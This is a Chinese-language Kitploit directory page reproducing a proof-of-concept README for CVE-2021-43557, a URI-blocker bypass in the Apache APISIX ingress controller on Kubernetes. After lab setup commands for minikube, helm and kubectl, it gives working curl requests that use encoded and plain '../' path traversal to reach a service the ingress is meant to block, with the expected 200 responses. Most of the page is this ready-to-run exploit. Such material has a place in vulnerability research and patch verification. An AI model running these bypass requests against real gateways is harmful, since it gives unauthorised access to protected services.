Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
k8s-CVE-2021-43557-poc — CVE-2021-43557 的 PoC | Kitploit
工具/GitHubGitHub/xvnpw/k8s-cve-2021-43557-poc
容器安全漏洞分析漏洞利用Web应用程序漏洞利用云安全API 安全
GitHubxvnpw/k8s-cve-2021-43557-poc

k8s-CVE-2021-43557-poc

CVE-2021-43557 的 PoC

查看仓库
223494年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

安装

  • 安装 minikube
  • 安装 apisix:
root@kitploit:~
helm repo add apisix https://charts.apiseven.com
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
kubectl create ns ingress-apisix
helm install apisix apisix/apisix \
  --set gateway.type=NodePort \
  --set ingress-controller.enabled=true \
  --namespace ingress-apisix \
  --version 0.7.2
kubectl get service --namespace ingress-apisix
  • 部署 app.yaml:kubectl apply -f app.yaml
  • 部署路由:kubectl apply -f routes.yaml

可选,如果需要更改应用镜像:

  • (可选)构建 Docker 镜像:
    • cd protected-service; docker build -t protected-service:0.0.1 .
    • cd public-service; docker build -t public-service:0.0.1 .
  • (可选)将 Docker 镜像推送到 minikube:
    • minikube image load protected-service:0.0.1
    • minikube image load public-service:0.0.1

利用

手动

访问公共服务:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/public -H 'Host: app.test'

应返回 200

访问受保护服务:

kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/protected-service/protected -H 'Host: app.test'

应返回 403

绕过 URI 拦截器访问受保护服务:kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/..%2Fprotected-service/protected -H 'Host: app.test' 绕过 URI 拦截器访问受保护服务:kubectl exec -it -n ${namespace of Apache APISIX} ${Pod name of Apache APISIX} -- curl --path-as-is http://127.0.0.1:9080/public-service/../protected-service/protected -H 'Host: app.test'

都应返回 200

下载工具